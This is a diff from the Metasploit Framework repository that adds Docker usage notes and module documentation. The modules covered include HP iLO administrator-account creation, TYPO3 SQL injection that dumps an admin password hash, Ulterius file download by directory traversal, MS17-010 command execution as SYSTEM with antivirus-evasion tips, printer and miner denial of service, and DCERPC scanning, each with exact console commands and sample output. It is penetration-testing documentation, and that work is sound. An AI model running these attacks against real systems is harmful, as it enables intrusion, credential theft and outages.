-```
-or
-```bash
 ./docker/bin/msfconsole
 ```
 
-To run `msfvenom`
+or
+
 ```bash
 docker-compose build
-docker-compose run --rm --no-deps ms ./msfvenom
+docker-compose run --rm --service-ports -e MSF_UID=$(id -u) -e MSF_GID=$(id -g) ms
 ```
-or
+To run `msfvenom`
 ```bash
 ./docker/bin/msfvenom
 ```
 
+or
+
+```bash
+docker-compose build
+docker-compose run --rm --no-deps -e MSF_UID=$(id -u) -e MSF_GID=$(id -g) ms ./msfvenom
+```
+
 You can pass any command line arguments to the binstubs or the docker-compose command and they will be passed to `msfconsole` or `msfvenom`. If you need to rebuild an image (for example when the Gemfile changes) you need to build the docker image using `docker-compose build` or supply the `--rebuild` parameter to the binstubs.
 
 ### But I want reverse shells...

docker/bin/msfconsole

@@ -27,4 +27,4 @@ if [[ $PARAMS == *"--rebuild"* ]]; then
   exit $?
 fi
 
-docker-compose run --rm --service-ports ms ./msfconsole -r docker/msfconsole.rc "$PARAMS"
+docker-compose run --rm --service-ports -e MSF_UID=$(id -u) -e MSF_GID=$(id -g) ms ./msfconsole -r docker/msfconsole.rc "$PARAMS"

docker/entrypoint.sh

@@ -0,0 +1,20 @@
+#!/bin/bash
+
+MSF_USER=msf
+MSF_GROUP=msf
+TMP=${MSF_UID:=1000}
+TMP=${MSF_GID:=1000}
+
+# don't recreate system users like root
+if [ "$MSF_UID" -lt "1000" ]; then
+  MSF_UID=1000
+fi
+
+if [ "$MSF_GID" -lt "1000" ]; then
+  MSF_GID=1000
+fi
+
+addgroup -g $MSF_GID $MSF_GROUP
+adduser -u $MSF_UID -D $MSF_USER -g $MSF_USER -G $MSF_GROUP $MSF_USER
+
+su-exec $MSF_USER "$@"

documentation/modules/auxiliary/admin/hp/hp_ilo_create_admin_account.md

@@ -0,0 +1,42 @@
+This module exploits the CVE-2017-12542 for authentication bypass on HP iLO, which is 100% stable when exploited this way, to create an arbitrary administrator account.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. `use auxiliary/admin/hp/hp_ilo_create_admin_account`
+3. Set `RHOST`
+4. run `check` to check if remote host is vulnerable (module tries to list accounts using the REST API)
+5. Set `USERNAME` and `PASSWORD` to specify a new administrator account credentials
+6. run `run` to actually create the account on the iLO
+
+## Options
+
+  **USERNAME**
+
+  The username of the new administrator account. Defaults to a random string.
+
+  **PASSWORD**
+
+  The password of the new administrator account. Defaults to a random string.
+
+## Scenarios
+
+### New administrator account creation
+
+```
+msf > use auxiliary/admin/hp/hp_ilo_create_admin_account 
+msf auxiliary(admin/hp/hp_ilo_create_admin_account) > set RHOST 192.168.42.78
+RHOST => 192.168.42.78
+msf auxiliary(admin/hp/hp_ilo_create_admin_account) > check
+[+] 192.168.42.78:443 The target is vulnerable.
+msf auxiliary(admin/hp/hp_ilo_create_admin_account) > set USERNAME test_user
+USERNAME => test_user
+msf auxiliary(admin/hp/hp_ilo_create_admin_account) > set PASSWORD test_password
+PASSWORD => test_password
+msf auxiliary(admin/hp/hp_ilo_create_admin_account) > run
+
+[*] Trying to create account test_user...
+[+] Account test_user/test_password created successfully.
+[*] Auxiliary module execution completed
+msf auxiliary(admin/hp/hp_ilo_create_admin_account) > 
+```

documentation/modules/auxiliary/admin/http/typo3_news_module_sqli.md

@@ -0,0 +1,49 @@
+## Description
+
+News module extensions v5.3.2 and earlier for TYPO3 contain an SQL injection vulnerability. This module allows an unauthenticated user to exploit the SQL injection vulnerability by generating requests to retrieve the password hash for the admin user of the application. This module has been tested on TYPO3 3.16.0 running news extension 5.0.0.
+
+## Vulnerable Application
+
+In vulnerable versions of the news module for TYPO3, a filter for unsetting user specified values does not account for capitalization of the paramter name. This allows a user to inject values to an SQL query.
+
+To exploit the vulnerability, the module generates requests and sets a value for `order` and `OrderByAllowed`, which gets passed to the SQL query. The requests are constructed to reorder the display of news articles based on a character matching. This allows a blind SQL injection to be performed to retrieve a username and password hash.
+
+## Options
+
+**PATTERN1** and **PATTERN2**
+
+These patterns are used to determine whether the news articles have been reordered. By default, the module will search for headlines and set the first identified headline to PATTERN1 and the second to PATTERN2.
+
+**ID**
+
+The value for query parameter `id` of the page that the news extension is running on.
+
+## Verification Steps
+
+- [ ] Install [Typo3 VM](https://www.turnkeylinux.org/download?file=turnkey-typo3-14.1-jessie-amd64.ova)
+- [ ] Launch the VM and configure it
+- [ ] SSH to the VM
+- [ ]  `cd /var/www/typo3/ && composer require georgringer/news:5.0.0`
+- [ ] Login to the web interface
+- [ ] Enable the news extension
+- [ ] Import [vulnerable page](https://github.com/rapid7/metasploit-framework/files/1015777/T3D__2017-05-20_02-17-z.t3d.zip)
+- [ ] Enable page
+- [ ] Verify if page is visble to unauthenticated user and note the id
+- [ ] `./msfconsole -q -x 'use auxiliary/admin/http/typo3_news_module_sqli; set rhost <rhost>; set id <id>; run'`
+- [ ] Username and password hash should have been retrieved
+
+## Scenarios
+
+### News Module 5.0.0 on TYPO3 3.16.0
+
+```
+msfdev@simulator:~/git/metasploit-framework$ ./msfconsole -q -x 'use auxiliary/admin/http/typo3_news_module_sqli; set rhost 172.22.222.136; set id 37; run'
+rhost => 172.22.222.136
+id => 37
+[*] Trying to automatically determine Pattern1 and Pattern2...
+[*] Pattern1: Article #1, Pattern2: Article #2
+[+] Username: admin
+[+] Password Hash: $P$Ch4lme3.gje9o.DjMip59baG7b/mIp.
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/http/typo3_news_module_sqli) > 
+```

documentation/modules/auxiliary/admin/http/ulterius_file_download.md

@@ -0,0 +1,64 @@
+## Description
+
+This module exploits a directory traversal vulnerability in [Ulterius Server < v1.9.5.0](https://github.com/Ulterius/server/releases). The directory traversal flaw occurs in Ulterius Server's `HttpServer.Process` function call. While processing file requests, the `HttpServer.Process` function does not validate that the requested file is within the web server's root directory or a subdirectory.
+
+## Vulnerable Application
+
+When requesting a file, a relative or absolute file path is needed so the appropriate request can be generated. Fortunately, Ulterius Server creates a file called `fileIndex.db`, which contains filenames and directories located on the server. By requesting `fileIndex.db` and parsing the retrieved data, absolute file paths can be retrieved for files hosted on the server. Using the information retrieved from parsing `fileIndex.db`, additional requests can be generated to download desired files.
+
+As noted in the [EDB PoC](https://www.exploit-db.com/exploits/43141/), the `fileIndex.db` is usually located at:
+
+`http://ulteriusURL:22006/.../fileIndex.db`
+
+Note: 22006 was the default port after setting up the Ulterius Server.
+
+After retrieving absolute paths for files, the files can be retrieved by sending requests of the form:
+
+`http://ulteriusURL:22006/<DriveLetter>:/<path>/<to>/<file>`
+
+Note: The [EDB PoC](https://www.exploit-db.com/exploits/43141/) used relative paths to download files but absolute paths can be used on Windows-platforms as well, because the `HttpServer.Process` function made use of the [Path.Combine](https://msdn.microsoft.com/en-us/library/fyy7a5kt(v=vs.110).aspx) function.
+
+> If *path2* includes a root, *path2* is returned. 
+
+## Options
+
+**PATH**
+
+This option specifies the absolute or relative path of the file to download. (default: `/…/fileIndex.db`)
+
+Note: If you are using relative paths, use three periods when traversing down a level in the directory structure. If absolute paths are used, make sure to include the drive letter.
+
+## Verification Steps
+
+- [ ] Install Ulterius Server < v1.9.5.0
+- [ ] `./msfconsole`
+- [ ] `use auxiliary/admin/http/ulterius_file_download`
+- [ ] `set rhost <rhost>`
+- [ ] `run`
+- [ ] Verify loot contains file system paths from remote file system.
+- [ ] `set path '<DriveLetter>:/<path>/<to>/<file>'`
+- [ ] `run`
+- [ ] Verify contents of file
+
+## Scenarios
+
+### Ulterius Server v1.8.0.0 on Windows 7 SP1 x64.
+
+```
+msf5 > use auxiliary/admin/http/ulterius_file_download
+msf5 auxiliary(admin/http/ulterius_file_download) > set rhost 172.22.222.122
+rhost => 172.22.222.122
+msf5 auxiliary(admin/http/ulterius_file_download) > run
+
+[*] Starting to parse fileIndex.db...
+[*] Remote file paths saved in: filepath0
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/http/ulterius_file_download) > set path 'C:/users/pwnduser/desktop/tmp.txt'
+path => C:/users/pwnduser/desktop/tmp.txt
+msf5 auxiliary(admin/http/ulterius_file_download) > run
+
+[*] C:/users/pwnduser/desktop/tmp.txt
+[*] File contents saved: filepath1
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/http/ulterius_file_download) >
+```

documentation/modules/auxiliary/admin/smb/ms17_010_command.md

@@ -0,0 +1,91 @@
+## Introduction
+
+MS17-010 and psexec are two of the most popular exploits against Microsoft Windows. This module bolts the two together.
+
+You can run any command as SYSTEM. Note: unlike EternalBlue, kernel shellcode is not used to stage Meterpreter, so you might have to evade your payloads.
+
+* CVE-2017-0146 (EternalChampion/EternalSynergy) - exploit a race condition with Transaction requests
+* CVE-2017-0143 (EternalRomance/EternalSynergy) - exploit a type confusion between WriteAndX and Transaction requests
+
+This module is highly reliable and preferred over EternalBlue where a Named Pipe is accessible for anonymous logins (generally, everything pre-Vista, and relatively common for domain computers in the wild).
+
+## Vulnerable Server
+
+To be able to use auxiliary/admin/smb/ms17_010_command:
+
+1. You can OPTIONALLY use a valid username/password to bypass most of these requirements.
+2. The firewall must allow SMB traffic.
+3. The target must use SMBv1.
+4. The target must be missing the MS17-010 patch.
+5. The target must allow anonymous IPC$ and a Named Pipe.
+
+You can check all of these with the SMB MS17-010 and Pipe Auditor auxiliary scanner modules.
+
+If you're having trouble configuring an anonymous named pipe,
+Microsoft's
+[documentation](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-named-pipes-that-can-be-accessed-anonymously)
+on the topic may be helpful.
+
+## Verification Steps
+
+At the minimum, you should be able use psexec to get a session with a valid credential using the following:
+
+```
+msf > use auxiliary/admin/smb/ms17_010_command
+msf exploit(psexec) > set RHOSTS 192.168.1.80
+RHOSTS => 192.168.1.80
+msf exploit(psexec) > exploit
+```
+
+## Options
+
+By default, using auxiliary/admin/smb/ms17_010_command can be as simple as setting the RHOSTS option, and you're ready to go.
+
+**The NAMEDPIPE Option**
+
+By default, the module will scan for a list of common pipes for any available one. You can specify one by name.
+
+**The LEAKATTEMPTS Option**
+
+Information leaks are used to ensure stability of the exploit. Sometimes they don't pop on the first try.
+
+**The DBGTRACE Option**
+
+Used to debug, gives extremely verbose information.
+
+**The SMBUser Option**
+
+This is a valid Windows username.
+
+**The SMBPass option**
+
+This can be either the plain text version or the Windows hash.
+
+## Scenarios
+
+**Automatic Target**
+
+There are multiple targets available for exploit/windows/smb/psexec. The Automatic target is the default target. If the  Automatic target detects Powershell on the remote machine, it will try Powershell, otherwise it uses the natvie upload. Each target is explained below.
+
+**Powershell Target**
+
+The Powershell target forces the psexec module to run a Powershell command with a payload embedded in it. Since this approach does not leave anything on disk, it is a very powerful way to evade antivirus. However, older Windows machines might not support Powershell by default.
+
+Because of this, you will probably want to use the Automatic target setting. The automatic mode will check if the target supports Powershell before it tries it; the manually set Powershell target won't do that.
+
+**Native Upload Target**
+
+The Native target will attempt to upload the payload (executable) to SYSTEM32 (which can be modified with the
+SHARE datastore option), and then execute it with psexec.
+
+This approach is generally reliable, but has a high chance of getting caught by antivirus on the target. To counter this, you can try to use a template by setting the EXE::Path and EXE::Template datastore options. Or, you can supply your own custom EXE by setting the EXE::Custom option.
+
+**MOF Upload Target**
+
+The [MOF](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-WbemExec-for-a-write-privilege-attack-on-Windows) target technically does not use psexec; it does not explicitly tell Windows to execute anything. All it does is upload two files: the payload (exe) in SYSTEM32 and a managed object
+format file in SYSTEM32\wbem\mof\ directory. When Windows sees the MOF file in that directory, it automatically runs it. Once executed, the code inside the MOF file basically tells Windows to execute our payload in SYSTEM32, and you get a session.
+
+Although it's a neat trick, Metasploit's MOF library only works against Windows XP and Windows Server 2003. And since it writes files to disk, there is also a high chance of getting
+caught by antivirus on the target.
+
+The best way to counter antivirus is still the same. You can either use a different template by setting the EXE::Path and EXE::Template datastore options or you can supply your own custom EXE by setting the EXE::Custom option.

documentation/modules/auxiliary/dos/http/brother_debut_dos.md

@@ -0,0 +1,34 @@
+## Vulnerable Application
+
+  Versions <= 1.20 of the Debut embedded httpd web server in use by Brother printers are vulnerable to denial of service 
+  via a crafted HTTP request. This module will render the printer unresponsive from requests for ~300 seconds.
+  This is thought to be caused by a single threaded web server which
+  has a ~300 second timeout value.  By sending a request with a content-length larger than the actual data, the server waits
+  to receive the rest of the data, which doesn't happen until the timeout occurs.  This DoS is for all services, not just http.
+
+  This module was successfully tested against a Brother HL-L2380DW series.
+
+  An nmap version scan of the vulnerable service should look similar to:
+  `80/tcp open  http    Debut embedded httpd 1.20 (Brother/HP printer http admin)`.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: ```use auxiliary/dos/http/brother_debut_dos```
+  3. Do: ```set rhost [ip]```
+  4. Do: ```run```
+  5. You should see Success, and manual attempts to browse the web interface don't load.
+
+## Scenarios
+
+### Brother HL-L2380DW with Debut embedded 1.20
+
+```
+resource (brother.rc)> use auxiliary/dos/http/brother_debut_dos
+resource (brother.rc)> set rhost 1.1.1.1
+rhost => 1.1.1.1
+resource (brother.rc)> exploit
+[*] Sending malformed POST request at 2018-01-24 20:45:52.
+[+] 1.1.1.1:80 - Connection Refused: Success! Server will recover about 2018-01-24 20:50:52
+[*] Auxiliary module execution completed
+```

documentation/modules/auxiliary/dos/tcp/claymore.md

@@ -0,0 +1,38 @@
+## Vulnerable Application
+
+Vulnerable application versions include:
+Claymore Dual GPU Miner<=10.5
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use auxiliary/dos/tcp/claymore_doc`
+3. Do: `set rhost`
+4. Do: `run`
+5. check your miner.
+
+## Scenarios
+
+### Claymore Dual GPU Miner/10.0 - window7
+
+```
+msf5 > use auxiliary/dos/tcp/claymore_dos
+msf5 auxiliary(dos/tcp/claymore_dos) > show options
+
+Module options (auxiliary/dos/tcp/claymore_dos):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   rhost                   yes       The target address
+   rport  3333             yes       The target port
+
+msf5 auxiliary(dos/tcp/claymore_dos) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf5 auxiliary(dos/tcp/claymore_dos) > run
+
+[*] Starting server...
+[*] Creating sockets...
+[*] Auxiliary module execution completed
+```
+
+

documentation/modules/auxiliary/gather/censys_search.md

@@ -3,10 +3,10 @@ The module use the Censys REST API to access the same data accessible through we
 ## Verification Steps
 
 1. Do: `use auxiliary/gather/censys_search`
-2. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX`
-3. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX`
+2. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX` (length: 32 (without dashes))
+3. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX` (length: 32)
 4. Do: `set CENSYS_SEARCHTYPE certificates`
-5: Do: `set CENSYS_DORK rapid7`
+5: Do: `set CENSYS_DORK query`
 6: Do: `run`
 
 ## Scenarios

documentation/modules/auxiliary/gather/shodan_honeyscore.md

@@ -1,8 +1,9 @@
-The `shodan_honeyscore` module utilizes the [Shodan](https://www.shodan.io/) API to determine whether or not a server is a honeypot or not. 
-When setting the module options, we aren't directly requesting `TARGET`, we are requesting the shodan API to analyze `TARGET` and return a honeyscore from 0.0 to 1.0. 0.0 being `not a honeypot` and 1.0 being a `honeypot`. The original website for the honeypot system can be found here: https://honeyscore.shodan.io/. 
+## Introduction
+The `shodan_honeyscore` module utilizes the [Shodan](https://www.shodan.io/) API to determine whether or not a server is a honeypot.
+When setting the module options, we aren't directly requesting `TARGET`, we are requesting the Shodan API to analyze `TARGET` and return a honeyscore from 0.0 to 1.0. 0.0 being `not a honeypot` and 1.0 being a `honeypot`. The original website for the honeypot system can be found here: https://honeyscore.shodan.io/.
 
-#### NOTE: 
-In order for this module to function properly, a Shodan API key is needed. You can register for a free acount here: https://account.shodan.io/register
+#### NOTE:
+In order for this module to function properly, a Shodan API key is needed. You can register for a free account here: https://account.shodan.io/register
 
 ## Verification Steps
 
@@ -11,18 +12,18 @@ In order for this module to function properly, a Shodan API key is needed. You c
   3. Do: `set TARGET <targetip>`
   4. Do: `set SHODAN_APIKEY <your apikey>`
   5. Do: `run`
-  6. If the API is up, you should recieve a score from 0.0 to 1.0.
+  6. If the API is up, you should receive a score from 0.0 to 1.0. (1.0 being a honeypot)
 
 ## Options
 
   **TARGET**
-  
+
   The remote host to request the API to scan.
-  
+
   **SHODAN_APIKEY**
 
-  This is the API key you recieve when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.
-  
+  This is the API key you receive when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.
+
 
 ## Scenarios
 

documentation/modules/auxiliary/scanner/dcerpc/endpoint_mapper.md

@@ -0,0 +1,117 @@
+## Description
+
+The endpoint_mapper module queries the EndPoint Mapper service of a remote system to determine what services are available. In the information gathering stage, this can provide some very valuable information.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/dcerpc/endpoint_mapper```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set THREADS [number of threads]```
+4. Do: ```run```
+
+### Example Windows 2003, and Windows 7 Targets
+
+```
+msf > use auxiliary/scanner/dcerpc/endpoint_mapper
+msf auxiliary(endpoint_mapper) > set RHOSTS 192.168.1.200-254
+RHOSTS => 192.168.1.200-254
+msf auxiliary(endpoint_mapper) > set THREADS 55
+threads => 55
+msf auxiliary(endpoint_mapper) > run
+[*] Connecting to the endpoint mapper service...
+[*] Connecting to the endpoint mapper service...
+[*] Connecting to the endpoint mapper service...
+...snip...
+[*] Connecting to the endpoint mapper service...
+[*] Connecting to the endpoint mapper service...
+[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 v1.0 LRPC (dhcpcsvc) [DHCP Client LRPC Endpoint]
+[*] 3473dd4d-2e88-4006-9cba-22570909dd10 v5.0 LRPC (W32TIME_ALT) [WinHttp Auto-Proxy Service]
+[*] 3473dd4d-2e88-4006-9cba-22570909dd10 v5.0 PIPE (\PIPE\W32TIME_ALT) \\XEN-2K3-BARE [WinHttp Auto-Proxy Service]
+[*] 906b0ce0-c70b-1067-b317-00dd010662da v1.0 LRPC (LRPC00000408.00000001) 
+[*] 906b0ce0-c70b-1067-b317-00dd010662da v1.0 LRPC (LRPC00000408.00000001) 
+[*] 906b0ce0-c70b-1067-b317-00dd010662da v1.0 LRPC (LRPC00000408.00000001) 
+[*] 906b0ce0-c70b-1067-b317-00dd010662da v1.0 LRPC (LRPC00000408.00000001) 
+[*] Could not connect to the endpoint mapper service
+[*] 12345778-1234-abcd-ef00-0123456789ac v1.0 PIPE (\PIPE\lsass) \\XEN-2K3-BARE 
+[*] 12345778-1234-abcd-ef00-0123456789ac v1.0 LRPC (audit) 
+[*] Connecting to the endpoint mapper service...
+[*] 12345778-1234-abcd-ef00-0123456789ac v1.0 LRPC (securityevent) 
+[*] 12345778-1234-abcd-ef00-0123456789ac v1.0 LRPC (protected_storage) 
+[*] 12345778-1234-abcd-ef00-0123456789ac v1.0 PIPE (\PIPE\protected_storage) \\XEN-2K3-BARE 
+[*] 12345778-1234-abcd-ef00-0123456789ac v1.0 LRPC (dsrole) 
+[*] 12345778-1234-abcd-ef00-0123456789ac v1.0 TCP (1025) 192.168.1.204 
+[*] 12345678-1234-abcd-ef00-0123456789ab v1.0 PIPE (\PIPE\lsass) \\XEN-2K3-BARE [IPSec Policy agent endpoint]
+[*] 12345678-1234-abcd-ef00-0123456789ab v1.0 LRPC (audit) [IPSec Policy agent endpoint]
+[*] 12345678-1234-abcd-ef00-0123456789ab v1.0 LRPC (securityevent) [IPSec Policy agent endpoint]
+[*] 12345678-1234-abcd-ef00-0123456789ab v1.0 LRPC (protected_storage) [IPSec Policy agent endpoint]
+[*] 12345678-1234-abcd-ef00-0123456789ab v1.0 PIPE (\PIPE\protected_storage) \\XEN-2K3-BARE [IPSec Policy agent endpoint]
+[*] 12345678-1234-abcd-ef00-0123456789ab v1.0 LRPC (dsrole) [IPSec Policy agent endpoint]
+[*] 12345678-1234-abcd-ef00-0123456789ab v1.0 TCP (1025) 192.168.1.204 [IPSec Policy agent endpoint]
+[*] 1ff70682-0a51-30e8-076d-740be8cee98b v1.0 LRPC (wzcsvc) 
+[*] 1ff70682-0a51-30e8-076d-740be8cee98b v1.0 LRPC (OLE3B0AF7639CA847BCA879F781582D) 
+[*] 1ff70682-0a51-30e8-076d-740be8cee98b v1.0 PIPE (\PIPE\atsvc) \\XEN-2K3-BARE 
+[*] 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0 LRPC (wzcsvc) 
+[*] 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0 LRPC (OLE3B0AF7639CA847BCA879F781582D) 
+[*] 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0 PIPE (\PIPE\atsvc) \\XEN-2K3-BARE 
+[*] 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53 v1.0 LRPC (wzcsvc) 
+[*] 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53 v1.0 LRPC (OLE3B0AF7639CA847BCA879F781582D) 
+[*] 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53 v1.0 PIPE (\PIPE\atsvc) \\XEN-2K3-BARE 
+[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 v1.0 LRPC (DNSResolver) [DHCP Client LRPC Endpoint]
+[*] d95afe70-a6d5-4259-822e-2c84da1ddb0d v1.0 TCP (49152) 192.168.1.202 
+[*] 4b112204-0e19-11d3-b42b-0000f81feb9f v1.0 LRPC (LRPC-71ea8d8164d4fa6391) 
+[*] 76f226c3-ec14-4325-8a99-6a46348418af v1.0 LRPC (WMsgKRpc05FBE22) 
+[*] 12e65dd8-887f-41ef-91bf-8d816c42c2e7 v1.0 LRPC (WMsgKRpc05FBE22) [Secure Desktop LRPC interface]
+[*] b58aa02e-2884-4e97-8176-4ee06d794184 v1.0 LRPC (OLE7A8F68570F354B65A0C8D44DCBE0) 
+[*] b58aa02e-2884-4e97-8176-4ee06d794184 v1.0 PIPE (\pipe\trkwks) \\XEN-WIN7-BARE 
+[*] b58aa02e-2884-4e97-8176-4ee06d794184 v1.0 LRPC (trkwks) 
+[*] b58aa02e-2884-4e97-8176-4ee06d794184 v1.0 LRPC (RemoteDevicesLPC_API) 
+[*] b58aa02e-2884-4e97-8176-4ee06d794184 v1.0 LRPC (TSUMRPD_PRINT_DRV_LPC_API) 
+[*] 0767a036-0d22-48aa-ba69-b619480f38cb v1.0 LRPC (OLE7A8F68570F354B65A0C8D44DCBE0) [PcaSvc]
+[*] 0767a036-0d22-48aa-ba69-b619480f38cb v1.0 PIPE (\pipe\trkwks) \\XEN-WIN7-BARE [PcaSvc]
+[*] 0767a036-0d22-48aa-ba69-b619480f38cb v1.0 LRPC (trkwks) [PcaSvc]
+[*] 0767a036-0d22-48aa-ba69-b619480f38cb v1.0 LRPC (RemoteDevicesLPC_API) [PcaSvc]
+...snip...
+[*] f6beaff7-1e19-4fbb-9f8f-b89e2018337c v1.0 LRPC (eventlog) [Event log TCPIP]
+[*] f6beaff7-1e19-4fbb-9f8f-b89e2018337c v1.0 PIPE (\pipe\eventlog) \\XEN-WIN7-BARE [Event log TCPIP]
+[*] f6beaff7-1e19-4fbb-9f8f-b89e2018337c v1.0 TCP (49153) 192.168.1.202 [Event log TCPIP]
+[*] 30adc50c-5cbc-46ce-9a0e-91914789e23c v1.0 LRPC (eventlog) [NRP server endpoint]
+[*] 30adc50c-5cbc-46ce-9a0e-91914789e23c v1.0 PIPE (\pipe\eventlog) \\XEN-WIN7-BARE [NRP server endpoint]
+[*] 30adc50c-5cbc-46ce-9a0e-91914789e23c v1.0 TCP (49153) 192.168.1.202 [NRP server endpoint]
+[*] 30adc50c-5cbc-46ce-9a0e-91914789e23c v1.0 LRPC (AudioClientRpc) [NRP server endpoint]
+[*] 30adc50c-5cbc-46ce-9a0e-91914789e23c v1.0 LRPC (Audiosrv) [NRP server endpoint]
+[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 v1.0 LRPC (eventlog) [DHCP Client LRPC Endpoint]
+[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 v1.0 PIPE (\pipe\eventlog) \\XEN-WIN7-BARE [DHCP Client LRPC Endpoint]
+[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 v1.0 TCP (49153) 192.168.1.202 [DHCP Client LRPC Endpoint]
+[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 v1.0 LRPC (AudioClientRpc) [DHCP Client LRPC Endpoint]
+[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 v1.0 LRPC (Audiosrv) [DHCP Client LRPC Endpoint]
+[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 v1.0 LRPC (dhcpcsvc) [DHCP Client LRPC Endpoint]
+[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6 v1.0 LRPC (eventlog) [DHCPv6 Client LRPC Endpoint]
+[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6 v1.0 PIPE (\pipe\eventlog) \\XEN-WIN7-BARE [DHCPv6 Client LRPC Endpoint]
+[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6 v1.0 TCP (49153) 192.168.1.202 [DHCPv6 Client LRPC Endpoint]
+[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6 v1.0 LRPC (AudioClientRpc) [DHCPv6 Client LRPC Endpoint]
+[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6 v1.0 LRPC (Audiosrv) [DHCPv6 Client LRPC Endpoint]
+[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6 v1.0 LRPC (dhcpcsvc) [DHCPv6 Client LRPC Endpoint]
+[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6 v1.0 LRPC (dhcpcsvc6) [DHCPv6 Client LRPC Endpoint]
+[*] 06bba54a-be05-49f9-b0a0-30f790261023 v1.0 LRPC (eventlog) [Security Center]
+[*] 06bba54a-be05-49f9-b0a0-30f790261023 v1.0 PIPE (\pipe\eventlog) \\XEN-WIN7-BARE [Security Center]
+[*] 06bba54a-be05-49f9-b0a0-30f790261023 v1.0 TCP (49153) 192.168.1.202 [Security Center]
+[*] 06bba54a-be05-49f9-b0a0-30f790261023 v1.0 LRPC (AudioClientRpc) [Security Center]
+[*] 06bba54a-be05-49f9-b0a0-30f790261023 v1.0 LRPC (Audiosrv) [Security Center]
+[*] 06bba54a-be05-49f9-b0a0-30f790261023 v1.0 LRPC (dhcpcsvc) [Security Center]
+[*] 06bba54a-be05-49f9-b0a0-30f790261023 v1.0 LRPC (dhcpcsvc6) [Security Center]
+[*] 06bba54a-be05-49f9-b0a0-30f790261023 v1.0 LRPC (OLE7F5D2071B7D4441897C08153F2A2) [Security Center]
+[*] 76f226c3-ec14-4325-8a99-6a46348418af v1.0 LRPC (WMsgKRpc045EC1) 
+[*] c9ac6db5-82b7-4e55-ae8a-e464ed7b4277 v1.0 LRPC (LRPC-af541be9090579589d) [Impl friendly name]
+[*] 76f226c3-ec14-4325-8a99-6a46348418af v1.0 LRPC (WMsgKRpc0441F0) 
+[*] 76f226c3-ec14-4325-8a99-6a46348418af v1.0 PIPE (\PIPE\InitShutdown) \\XEN-WIN7-BARE 
+[*] 76f226c3-ec14-4325-8a99-6a46348418af v1.0 LRPC (WindowsShutdown) 
+[*] d95afe70-a6d5-4259-822e-2c84da1ddb0d v1.0 LRPC (WMsgKRpc0441F0) 
+[*] d95afe70-a6d5-4259-822e-2c84da1ddb0d v1.0 PIPE (\PIPE\InitShutdown) \\XEN-WIN7-BARE 
+[*] d95afe70-a6d5-4259-822e-2c84da1ddb0d v1.0 LRPC (WindowsShutdown) 
+[*] Could not connect to the endpoint mapper service
+[*] Scanned 06 of 55 hosts (010% complete)
+...snip...
+[*] Scanned 55 of 55 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(endpoint_mapper) >
+```

documentation/modules/auxiliary/scanner/dcerpc/hidden.md

@@ -0,0 +1,62 @@
+## Description
+
+The hidden scanner connects to a given range of IP addresses and tries to locate any RPC services that are not listed in the Endpoint Mapper and determines if anonymous access to the service is allowed.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/dcerpc/hidden```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set THREADS [number of threads]```
+4. Do: ```run```
+
+## Scenarios
+
+```
+msf > use auxiliary/scanner/dcerpc/hidden
+msf auxiliary(hidden) > set RHOSTS 192.168.1.200-254
+RHOSTS => 192.168.1.200-254
+msf auxiliary(hidden) > set THREADS 55
+THREADS => 55
+msf auxiliary(hidden) > run
+
+[*] Connecting to the endpoint mapper service...
+[*] Connecting to the endpoint mapper service...
+[*] Connecting to the endpoint mapper service...
+...snip...
+[*] Connecting to the endpoint mapper service...
+[*] Connecting to the endpoint mapper service...
+[*] Could not obtain the endpoint list: DCERPC FAULT => nca_s_fault_access_denied
+[*] Could not contact the endpoint mapper on 192.168.1.203
+[*] Could not obtain the endpoint list: DCERPC FAULT => nca_s_fault_access_denied
+[*] Could not contact the endpoint mapper on 192.168.1.201
+[*] Could not connect to the endpoint mapper service
+[*] Could not contact the endpoint mapper on 192.168.1.250
+[*] Looking for services on 192.168.1.204:1025...
+[*] 	HIDDEN: UUID 12345778-1234-abcd-ef00-0123456789ab v0.0
+[*] Looking for services on 192.168.1.202:49152...
+[*] 		CONN BIND CALL ERROR=DCERPC FAULT => nca_s_fault_ndr 
+[*] 
